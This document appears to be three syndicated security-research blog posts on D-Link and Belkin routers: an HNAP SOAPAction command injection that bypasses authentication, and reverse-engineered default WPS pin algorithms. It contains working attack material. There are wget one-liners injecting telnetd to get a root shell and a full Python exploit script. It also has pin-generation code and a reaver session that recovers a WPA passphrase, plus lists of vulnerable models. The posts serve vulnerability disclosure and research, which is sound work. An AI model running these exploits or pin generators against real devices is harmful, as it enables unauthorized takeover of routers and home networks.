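The dispatch pattern itself, one binary choosing its behaviour from argv[0] in the style of busybox, can be sketched in a few lines of Python; the handler names below come from the symlink listing, while the handler bodies are placeholders:

```python
import os

# Map symlink names to handlers, mimicking cgibin's strcmp() staircase.
# Only the names come from the listing; the bodies are placeholders.
HANDLERS = {
    "captcha.cgi": lambda: "handle captcha",
    "fwup.cgi": lambda: "handle firmware upload",
    "hedwig.cgi": lambda: "handle hedwig",
}

def dispatch(argv0):
    # argv[0] is the path the binary was invoked as, e.g. via a symlink.
    name = os.path.basename(argv0)
    handler = HANDLERS.get(name)
    return handler() if handler else "unknown action"
```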
Now that we’ve got some of the high-level functions identified, let’s start bug hunting. Other D-Link devices running essentially the same firmware have previously been exploited through both their HTTP and UPnP interfaces. However, the HNAP interface, which is handled by the hnap_main function in cgibin, seems to have been mostly overlooked.
HNAP (Home Network Administration Protocol) is a SOAP-based protocol, similar to UPnP, that is commonly used by D-Link’s “EZ” setup utilities to initially configure the router. Unlike UPnP however, all HNAP actions, with the exception of GetDeviceSettings (which is basically useless), require HTTP Basic authentication:

POST /HNAP1 HTTP/1.1
Host: 192.168.0.1
Authorization: Basic YWMEHZY+
Content-Type: text/xml; charset=utf-8
Content-Length: length
SOAPAction: "http://purenetworks.com/HNAP1/AddPortMapping"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<AddPortMapping xmlns="http://purenetworks.com/HNAP1/">
<PortMappingDescription>foobar</PortMappingDescription>
<InternalClient>192.168.0.100</InternalClient>
<PortMappingProtocol>TCP</PortMappingProtocol>
<ExternalPort>1234</ExternalPort>
<InternalPort>1234</InternalPort>
</AddPortMapping>
</soap:Body>
</soap:Envelope>

The SOAPAction header is of particular importance in an HNAP request, because it specifies which HNAP action should be taken (AddPortMapping in the above example).
Since cgibin is executed as a CGI by the web server, hnap_main accesses HNAP request data, such as the SOAPAction header, via environment variables:
SOAPAction = getenv("HTTP_SOAPACTION");
Towards the end of hnap_main, there is a shell command being built dynamically with sprintf; this command is then executed via system:
sprintf(command, "sh %s%s.sh > /dev/console", "/var/run/", SOAPAction);
Clearly, hnap_main is using data from the SOAPAction header as part of the system command! This is a promising command injection bug, if the contents of the SOAPAction header aren’t being sanitized, and if we can get into this code block without authentication.
Going back to the beginning of hnap_main, one of the first checks it does is to see if the SOAPAction header is equal to the string http://purenetworks.com/HNAP1/GetDeviceSettings; if so, then it skips the authentication check. This is expected, as we’ve already established that the GetDeviceSettings action does not require authentication:
if(strstr(SOAPAction, "http://purenetworks.com/HNAP1/GetDeviceSettings") != NULL)
However, note that strstr is used for this check, which only indicates that the SOAPAction header contains the http://purenetworks.com/HNAP1/GetDeviceSettings string, not that the header equals that string.
So, if the SOAPAction header contains the string http://purenetworks.com/HNAP1/GetDeviceSettings, the code then proceeds to parse the action name (e.g., GetDeviceSettings) out of the header and remove any trailing double-quotes:
SOAPAction = strrchr(SOAPAction, '/');
It is the action name (e.g., GetDeviceSettings), parsed out of the header by the above code, that is sprintf‘d into the command string executed by system.
Here’s the code in C, to help highlight the flaw in the above logic:

/* Grab a pointer to the SOAPAction header */
SOAPAction = getenv("HTTP_SOAPACTION");

/* Skip authentication if the SOAPAction header contains "http://purenetworks.com/HNAP1/GetDeviceSettings" */
if(strstr(SOAPAction, "http://purenetworks.com/HNAP1/GetDeviceSettings") == NULL)
{
    /* do auth check */
}

/* Do a reverse search for the last forward slash in the SOAPAction header */
SOAPAction = strrchr(SOAPAction, '/');
if(SOAPAction != NULL)
{
    /* Point the SOAPAction pointer one byte beyond the last forward slash */
    SOAPAction += 1;

    /* Get rid of any trailing double quotes */
    if(SOAPAction[strlen(SOAPAction)-1] == '"')
    {
        SOAPAction[strlen(SOAPAction)-1] = '\0';
    }
}
else
{
    goto failure_condition;
}

/* Build the command using the specified SOAPAction string and execute it */
sprintf(command, "sh %s%s.sh > /dev/console", "/var/run/", SOAPAction);
system(command);

The two important take-aways from this are:

1. There is no authentication check if the SOAPAction header contains the string http://purenetworks.com/HNAP1/GetDeviceSettings
2. The string passed to sprintf (and ultimately system) is everything after the last forward slash in the SOAPAction header

Thus, we can easily format a SOAPAction header that both satisfies the “no auth” check, and allows us to pass an arbitrary string to system:

SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings/`reboot`"

The http://purenetworks.com/HNAP1/GetDeviceSettings portion of the header satisfies the “no auth” check, while the `reboot` string ends up getting passed to system:

system("sh /var/run/`reboot`.sh > /dev/console");
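To see exactly what reaches system, the flawed header handling can be re-implemented in a few lines of Python (a re-creation of the decompiled logic above, not code from the firmware):

```python
def hnap_command(soapaction):
    # Mirror of the flawed cgibin logic: auth is skipped whenever the
    # header merely *contains* the GetDeviceSettings URL (strstr), and
    # everything after the last '/' (strrchr) is spliced into a shell
    # command after stripping a trailing double quote.
    if "http://purenetworks.com/HNAP1/GetDeviceSettings" not in soapaction:
        raise PermissionError("authentication required")
    action = soapaction.rsplit("/", 1)[1]
    if action.endswith('"'):
        action = action[:-1]
    return "sh /var/run/%s.sh > /dev/console" % action

# The injected backticks survive into the command string:
cmd = hnap_command('"http://purenetworks.com/HNAP1/GetDeviceSettings/`reboot`"')
# cmd == 'sh /var/run/`reboot`.sh > /dev/console'
```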

Replacing reboot with telnetd spawns a telnet server that provides an unauthenticated root shell:

$ wget --header='SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings/`telnetd`"' http://192.168.0.1/HNAP1
$ telnet 192.168.0.1
Trying 192.168.0.1…
Connected to 192.168.0.1.
Escape character is '^]'.

BusyBox v1.14.1 (2015-02-11 17:15:51 CST) built-in shell (msh)
Enter 'help' for a list of built-in commands.

#

If remote administration is enabled, HNAP requests are honored from the WAN, making remote exploitation possible. Of course, the router’s firewall will block any incoming telnet connections from the WAN; a simple solution is to kill off the HTTP server and spawn your telnet server on whatever port the HTTP server was bound to:

$ wget --header='SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings/`killall httpd; telnetd -p 8080`"' http://1.2.3.4:8080/HNAP1
$ telnet 1.2.3.4 8080
Trying 1.2.3.4…
Connected to 1.2.3.4.
Escape character is '^]'.

BusyBox v1.14.1 (2015-02-11 17:15:51 CST) built-in shell (msh)
Enter 'help' for a list of built-in commands.

#

Note that the wget requests will hang, since cgibin is essentially waiting for telnetd to return. A little Python PoC makes the exploit less awkward:

#!/usr/bin/env python

import sys
import urllib2
import httplib

try:
    ip_port = sys.argv[1].split(':')
    ip = ip_port[0]

    if len(ip_port) == 2:
        port = ip_port[1]
    elif len(ip_port) == 1:
        port = "80"
    else:
        raise IndexError
except IndexError:
    print "Usage: %s <target ip:port>" % sys.argv[0]
    sys.exit(1)

url = "http://%s:%s/HNAP1" % (ip, port)
# NOTE: If exploiting from the LAN, telnetd can be started on
#       any port; killing the http server and re-using its port
#       is not necessary.
#
#       Killing off all hung hnap processes ensures that we can
#       re-start httpd later.
command = "killall httpd; killall hnap; telnetd -p %s" % port
headers = {
    "SOAPAction" : '"http://purenetworks.com/HNAP1/GetDeviceSettings/`%s`"' % command,
}

req = urllib2.Request(url, None, headers)
try:
    urllib2.urlopen(req)
    raise Exception("Unexpected response")
except httplib.BadStatusLine:
    print "Exploit sent, try telnetting to %s:%s!" % (ip, port)
    print "To dump all system settings, run (no quotes): 'xmldbc -d /var/config.xml; cat /var/config.xml'"
    sys.exit(0)
except Exception:
    print "Received an unexpected response from the server; exploit probably failed. :("

I’ve tested both the v1.00 and v1.03 firmware (v1.03 being the latest at the time of this writing), and both are vulnerable. But, as is true with most embedded vulnerabilities, this code has snuck its way into other devices as well.
Analyzing “all the firmwares” is tedious, so I handed this bug over to our Centrifuge team at work, who have a great automated analysis system for this sort of thing. Centrifuge found that at least the following devices are also vulnerable:

DAP-1522 revB
DAP-1650 revB
DIR-880L
DIR-865L
DIR-860L revA
DIR-860L revB
DIR-815 revB
DIR-300 revB
DIR-600 revB
DIR-645
TEW-751DR
TEW-733GR

AFAIK, there is no way to disable HNAP on any of these devices.
UPDATE:
Looks like this same bug was found earlier this year by Samuel Huntly, but only reported and patched for the DIR-645. The patch looks pretty shitty though, so expect a follow-up post soon.

Reversing Belkin’s WPS Pin Algorithm

Post Syndicated from Craig original http://www.devttys0.com/2015/04/reversing-belkins-wps-pin-algorithm/

After finding D-Link’s WPS algorithm, I was curious to see which vendors might have similar algorithms, so I grabbed some Belkin firmware and started dissecting it. This particular firmware uses the SuperTask! RTOS, and in fact uses the same firmware obfuscation as seen previously on the Linksys WRT120N:

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             Obfuscated Arcadyan firmware, signature bytes: 0x12010920, see https://github.com/devttys0/wrt120n/deobfuscator
666624        0xA2C00         LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 454656 bytes

Being a known obfuscation method, binwalk was able to de-obfuscate and extract the compressed firmware image. The next step was to figure out the code’s load address in order to get a proper disassembly in IDA; if the code is disassembled with the wrong load address, absolute memory references won’t be properly resolved.

Absolute addresses in the code can hint at the load address, such as this loop which zeros out the BSS data section:
BSS zero loop
BSS zeroing loops are usually easy to spot, as they will zero out relatively large regions of memory, and are typically encountered very early on in the code.
Here, the code is filling everything from 0x802655F0 to 0x80695574 with zeros, so this must be a valid address range in memory. Further, BSS is commonly located just after all the other code and data sections; in this case, the firmware image we’ve loaded into IDA is 0x2635EB bytes in size, so we would expect the BSS section to begin somewhere after this in memory:
End of ROM
In fact, subtracting the size of the firmware image from the start of the BSS section results in a value suspiciously close to 0x80002000:
0x802655F0 - 0x2635EB = 0x80002005
Setting 0x80002000 as the load address in IDA, we get a rather respectable disassembly:
A reasonable disassembly listing
With a reasonable disassembly, the search for a WPS pin generation algorithm could begin in earnest. Any function that generates WPS pins will, at some point, have to calculate the WPS pin checksum, so a sensible first step is to identify the function(s) responsible for computing that checksum.
However, without a symbol table, finding a function conveniently named “wps_checksum” is not likely; luckily, MIPS C compilers tend to generate a predictable set of immediate values when generating the WPS checksum assembly code, a pattern I noticed when reversing D-Link’s WPS pin algorithm. Using an IDAPython script to search for these immediate values greatly simplifies the process of identifying the WPS checksum function:
WPS pin checksum immediate values
There are only a few functions that call wps_checksum, and one of them contains a reference to a very interesting string:
"GenerateDefaultPin"
There’s a lot of xoring and shifting going on in the GenerateDefaultPin code, but what is more interesting is what data it is munging. Looking at the values passed to GenerateDefaultPin, we can see that it is given both the router’s MAC address and serial number:
GenerateDefaultPin(char *buf, int unused, char *mac, char *serial);
MAC addresses are easily gathered by a wireless attacker; serial numbers can be a bit more difficult. Although serial numbers aren’t particularly random, GenerateDefaultPin uses the least significant 4 digits of the serial number, which are unpredictable enough to prevent an external attacker from reliably calculating the WPS pin.
Or, at least that would be the case if the Belkin’s 802.11 probe response packets didn’t include the device’s serial number in its WPS information element:
Belkin probe response packet, captured in Wireshark
Since WiFi probe request/response packets are not encrypted, an attacker can gather the MAC address (the MAC address used by the algorithm is the LAN MAC) and serial number of a target by sending a single probe request packet to a victim access point.
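Extracting the serial from such a capture just means walking the WPS information element's TLV attributes, each of which has a 2-byte big-endian type and length; type 0x1042 is the standard Serial Number attribute. A minimal parser sketch, assuming the raw WPS IE payload has already been pulled out of the probe response with your capture tool of choice:

```python
import struct

WPS_ATTR_SERIAL_NUMBER = 0x1042

def parse_wps_serial(ie_data):
    """Walk the WPS IE's TLV attributes (2-byte big-endian type and
    length fields) and return the Serial Number attribute, if present."""
    offset = 0
    while offset + 4 <= len(ie_data):
        attr_type, attr_len = struct.unpack_from(">HH", ie_data, offset)
        offset += 4
        if attr_type == WPS_ATTR_SERIAL_NUMBER:
            return ie_data[offset:offset + attr_len].decode("ascii")
        offset += attr_len
    return None

# Craft a tiny example IE: a Version attribute followed by a (made-up) serial
ie = struct.pack(">HH", 0x104A, 1) + b"\x10" + \
     struct.pack(">HH", 0x1042, 12) + b"271301234567"
print(parse_wps_serial(ie))  # -> 271301234567
```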
We just need to reverse the GenerateDefaultPin code to determine how it is using the MAC address and serial number to create a unique WPS pin (download PoC here):

/* Used in the Belkin code to convert an ASCII character to an integer */
int char2int(char c)
{
    char buf[2] = { 0 };

    buf[0] = c;
    return strtol(buf, NULL, 16);
}

/* Generates a standard WPS checksum from a 7 digit pin */
int wps_checksum(int pin)
{
    int div = 0;

    while(pin)
    {
        div += 3 * (pin % 10);
        pin /= 10;
        div += pin % 10;
        pin /= 10;
    }

    return ((10 - div % 10) % 10);
}

/* Munges the MAC and serial numbers to create a WPS pin */
int pingen(char *mac, char *serial)
{
#define NIC_NIBBLE_0    0
#define NIC_NIBBLE_1    1
#define NIC_NIBBLE_2    2
#define NIC_NIBBLE_3    3

#define SN_DIGIT_0      0
#define SN_DIGIT_1      1
#define SN_DIGIT_2      2
#define SN_DIGIT_3      3

    int sn[4], nic[4];
    int mac_len, serial_len;
    int k1, k2, pin;
    int p1, p2, p3;
    int t1, t2;

    mac_len = strlen(mac);
    serial_len = strlen(serial);

    /* Get the four least significant digits of the serial number */
    sn[SN_DIGIT_0] = char2int(serial[serial_len-1]);
    sn[SN_DIGIT_1] = char2int(serial[serial_len-2]);
    sn[SN_DIGIT_2] = char2int(serial[serial_len-3]);
    sn[SN_DIGIT_3] = char2int(serial[serial_len-4]);

    /* Get the four least significant nibbles of the MAC address */
    nic[NIC_NIBBLE_0] = char2int(mac[mac_len-1]);
    nic[NIC_NIBBLE_1] = char2int(mac[mac_len-2]);
    nic[NIC_NIBBLE_2] = char2int(mac[mac_len-3]);
    nic[NIC_NIBBLE_3] = char2int(mac[mac_len-4]);

    k1 = (sn[SN_DIGIT_2] +
          sn[SN_DIGIT_3] +
          nic[NIC_NIBBLE_0] +
          nic[NIC_NIBBLE_1]) % 16;

    k2 = (sn[SN_DIGIT_0] +
          sn[SN_DIGIT_1] +
          nic[NIC_NIBBLE_3] +
          nic[NIC_NIBBLE_2]) % 16;

    pin = k1 ^ sn[SN_DIGIT_1];

    t1 = k1 ^ sn[SN_DIGIT_0];
    t2 = k2 ^ nic[NIC_NIBBLE_1];

    p1 = nic[NIC_NIBBLE_0] ^ sn[SN_DIGIT_1] ^ t1;
    p2 = k2 ^ nic[NIC_NIBBLE_0] ^ t2;
    p3 = k1 ^ sn[SN_DIGIT_2] ^ k2 ^ nic[NIC_NIBBLE_2];

    k1 = k1 ^ k2;

    pin = (pin ^ k1) * 16;
    pin = (pin + t1) * 16;
    pin = (pin + p1) * 16;
    pin = (pin + t2) * 16;
    pin = (pin + p2) * 16;
    pin = (pin + k1) * 16;
    pin += p3;
    pin = (pin % 10000000) - (((pin % 10000000) / 10000000) * k1);

    return (pin * 10) + wps_checksum(pin);
}
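For quick experimentation, the C PoC above also ports directly to Python; the MAC and serial strings in the example are made up, so the printed pin is illustrative only:

```python
def char2int(c):
    # The Belkin code parses one ASCII hex character via strtol(buf, NULL, 16)
    return int(c, 16)

def wps_checksum(pin):
    # Standard WPS checksum digit for a 7-digit pin
    div = 0
    while pin:
        div += 3 * (pin % 10)
        pin //= 10
        div += pin % 10
        pin //= 10
    return (10 - div % 10) % 10

def pingen(mac, serial):
    # Four least significant serial digits and MAC nibbles, least significant first
    sn = [char2int(serial[-1 - i]) for i in range(4)]
    nic = [char2int(mac[-1 - i]) for i in range(4)]

    k1 = (sn[2] + sn[3] + nic[0] + nic[1]) % 16
    k2 = (sn[0] + sn[1] + nic[3] + nic[2]) % 16

    pin = k1 ^ sn[1]
    t1 = k1 ^ sn[0]
    t2 = k2 ^ nic[1]
    p1 = nic[0] ^ sn[1] ^ t1
    p2 = k2 ^ nic[0] ^ t2
    p3 = k1 ^ sn[2] ^ k2 ^ nic[2]
    k1 ^= k2

    pin = (pin ^ k1) * 16
    pin = (pin + t1) * 16
    pin = (pin + p1) * 16
    pin = (pin + t2) * 16
    pin = (pin + p2) * 16
    pin = (pin + k1) * 16
    pin += p3
    pin %= 10000000  # the k1 correction term in the C code is always zero here

    return (pin * 10) + wps_checksum(pin)

# Made-up LAN MAC and serial number, for illustration only:
print("%08d" % pingen("94103EA1B2C3", "271301234567"))
```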

Of the 24 Belkin routers tested, 80% of them were found to be using this algorithm for their default WPS pin:
Confirmed vulnerable:

F9K1001v4
F9K1001v5
F9K1002v1
F9K1002v2
F9K1002v5
F9K1103v1
F9K1112v1
F9K1113v1
F9K1105v1
F6D4230-4v2
F6D4230-4v3
F7D2301v1
F7D1301v1
F5D7234-4v3
F5D7234-4v4
F5D7234-4v5
F5D8233-4v1
F5D8233-4v3
F5D9231-4v1

Confirmed not vulnerable:

F9K1001v1
F9K1105v2
F6D4230-4v1
F5D9231-4v2
F5D8233-4v4

It’s not entirely fair to pick on Belkin though, as this appears to be an issue specific to Arcadyan, who is the ODM for many Belkin products, as well as others. This means that there are additional devices and vendors affected besides those listed above.

Reversing D-Link’s WPS Pin Algorithm

Post Syndicated from Craig original http://www.devttys0.com/2014/10/reversing-d-links-wps-pin-algorithm/

While perusing the latest firmware for D-Link’s DIR-810L 802.11ac router, I found an interesting bit of code in sbin/ncc, a binary which provides back-end services used by many other processes on the device, including the HTTP and UPnP servers:
Call to sub_4D56F8 from getWPSPinCode
I first began examining this particular piece of code with the hopes of controlling part of the format string that is passed to __system. However, this data proved not to be user controllable, as the value placed in the format string is the default WPS pin for the router.

The default WPS pin itself is retrieved via a call to sub_4D56F8. Since the WPS pin is typically programmed into NVRAM at the factory, one might expect sub_4D56F8 to simply be performing some NVRAM queries, but that is not the case:
The beginning of sub_4D56F8
This code isn’t retrieving a WPS pin at all, but instead is grabbing the router’s WAN MAC address. The MAC address is then split into its OUI and NIC components, and a tedious set of multiplications, xors, and shifts ensues (full disassembly listing here):
Break out the MAC and start munging the NIC
While the math being performed is not complicated, determining the original programmer’s intent is not necessarily straightforward due to the assembly generated by the compiler. Take the following instruction sequence for example:
li $v0, 0x38E38E39
multu $a3, $v0

mfhi $v0
srl $v0, 1

Directly converted into C, this reads:

v0 = (uint32_t)(((uint64_t)a3 * 0x38E38E39) >> 32) >> 1;

Which is just a fancy way of dividing by 9:

v0 = a3 / 9;

Likewise, most multiplication and modulus operations are also performed by various sequences of shifts, additions, and subtractions. The multu assembly instruction is only used for the above example where the high 32 bits of a product are needed, and there is nary a divu in sight.
However, after translating the entire sub_4D56F8 disassembly listing into a more palatable format, it’s obvious that this code is using a simple algorithm to generate the default WPS pin entirely from the NIC portion of the device’s WAN MAC address:

unsigned int generate_default_pin(char *buf)
{
    char *mac;
    char mac_address[32] = { 0 };
    unsigned int oui, nic, pin;

    /* Get a pointer to the WAN MAC address */
    mac = lockAndGetInfo_log()->wan_mac_address;

    /*
     * Create a local, NULL-terminated copy of the WAN MAC (simplified from
     * the original code's sprintf/memmove loop).
     */
    sprintf(mac_address, "%c%c%c%c%c%c%c%c%c%c%c%c", mac[0],
                                                     mac[1],
                                                     mac[2],
                                                     mac[3],
                                                     mac[4],
                                                     mac[5],
                                                     mac[6],
                                                     mac[7],
                                                     mac[8],
                                                     mac[9],
                                                     mac[10],
                                                     mac[11]);

    /*
     * Convert the OUI and NIC portions of the MAC address to integer values.
     * OUI is unused, just need the NIC.
     */
    sscanf(mac_address, "%06X%06X", &oui, &nic);

    /* Do some XOR munging of the NIC. */
    pin = (nic ^ 0x55AA55);
    pin = pin ^ (((pin & 0x0F) << 4) +
                 ((pin & 0x0F) << 8) +
                 ((pin & 0x0F) << 12) +
                 ((pin & 0x0F) << 16) +
                 ((pin & 0x0F) << 20));

    /*
     * The largest possible remainder for any value divided by 10,000,000
     * is 9,999,999 (7 digits). The smallest possible remainder is, obviously, 0.
     */
    pin = pin % 10000000;

    /* The pin needs to be at least 7 digits long */
    if(pin < 1000000)
    {
        /*
         * The largest possible remainder for any value divided by 9 is
         * 8; hence this adds at most 9,000,000 to the pin value, and at
         * least 1,000,000. This guarantees that the pin will be 7 digits
         * long, and also means that it won't start with a 0.
         */
        pin += ((pin % 9) * 1000000) + 1000000;
    }

    /*
     * The final 8 digit pin is the 7 digit value just computed, plus a
     * checksum digit. Note that in the disassembly, the wps_pin_checksum
     * function is inlined (it's just the standard WPS checksum implementation).
     */
    pin = ((pin * 10) + wps_pin_checksum(pin));

    sprintf(buf, "%08d", pin);
    return pin;
}
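As a sanity check, the routine above translates directly to Python (taking the MAC as a colon-separated string rather than reading it from NVRAM); feeding it the WAN MAC from the capture that follows reproduces the pin that reaver accepts:

```python
def wps_pin_checksum(pin):
    # Standard WPS checksum digit for a 7-digit pin
    div = 0
    while pin:
        div += 3 * (pin % 10)
        pin //= 10
        div += pin % 10
        pin //= 10
    return (10 - div % 10) % 10

def dlink_pingen(mac):
    # NIC portion: low 24 bits of the MAC (the WAN MAC on the DIR-810L;
    # the BSSID on most other affected models)
    nic = int(mac.replace(":", "")[-6:], 16)

    pin = nic ^ 0x55AA55
    pin ^= (((pin & 0x0F) << 4) +
            ((pin & 0x0F) << 8) +
            ((pin & 0x0F) << 12) +
            ((pin & 0x0F) << 16) +
            ((pin & 0x0F) << 20))
    pin %= 10000000

    if pin < 1000000:
        # Pad up to 7 digits, exactly as the ncc code does
        pin += ((pin % 9) * 1000000) + 1000000

    return "%08d" % ((pin * 10) + wps_pin_checksum(pin))

print(dlink_pingen("C0:A0:BB:EF:B3:D7"))  # -> 99767389
```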

Since the BSSID is only off-by-one from the WAN MAC, we can easily calculate any DIR-810L’s WPS pin just from a passive packet capture:

$ sudo airodump-ng mon0 -c 4

CH 4 ][ Elapsed: 0 s ][ 2014-09-11 11:44 ][ fixed channel mon0: -1

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

C0:A0:BB:EF:B3:D6 -13 0 6 0 0 4 54e WPA2 CCMP PSK dlink-B3D6

$ ./pingen C0:A0:BB:EF:B3:D7   # <-- WAN MAC is BSSID+1
Default Pin: 99767389

$ sudo reaver -i mon0 -b C0:A0:BB:EF:B3:D6 -c 4 -p 99767389

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Waiting for beacon from C0:A0:BB:EF:B3:D6
[+] Associated with C0:A0:BB:EF:B3:D6 (ESSID: dlink-B3D6)
[+] WPS PIN: '99767389'
[+] WPA PSK: 'hluig79268'
[+] AP SSID: 'dlink-B3D6'
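
The BSSID-to-WAN-MAC step in the example above is just 48-bit arithmetic; a small helper (hypothetical function name) makes it explicit:

```python
def bssid_to_wan_mac(bssid):
    # On the DIR-810L the WAN MAC is the BSSID plus one; treat the MAC as a
    # 48-bit integer, increment, and re-format (wrap-around masked for safety)
    value = (int(bssid.replace(":", ""), 16) + 1) & 0xFFFFFFFFFFFF
    raw = "%012X" % value
    return ":".join(raw[i:i + 2] for i in range(0, 12, 2))

print(bssid_to_wan_mac("C0:A0:BB:EF:B3:D6"))  # -> C0:A0:BB:EF:B3:D7
```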

But the DIR-810L isn’t the only device to use this algorithm. In fact, it appears to have been in use for some time, dating all the way back to 2007 when WPS was first introduced. The following is an – I’m sure – incomplete list of affected and unaffected devices:
Confirmed Affected:

DIR-810L
DIR-826L
DIR-632
DHP-1320
DIR-835
DIR-615 revs: B2, C1, E1, E3
DIR-657
DIR-827
DIR-857
DIR-451
DIR-655 revs: A3, A4, B1
DIR-825 revs: A1, B1
DIR-651
DIR-855
DIR-628
DGL-4500
DIR-601 revs: A1, B1
DIR-836L
DIR-808L
DIR-636L
DAP-1350
DAP-1555

Confirmed Unaffected:

DIR-815
DIR-505L
DIR-300
DIR-850L
DIR-412
DIR-600
DIR-685
DIR-817LW
DIR-818LW
DIR-803
DIR-845L
DIR-816L
DIR-860L
DIR-645
DAP-1522

Some affected devices, like the DIR-810L, generate the WPS pin from the WAN MAC; most generate it from the BSSID. A stand-alone tool implementing this algorithm can be found here, and has already been rolled into the latest Reaver Pro.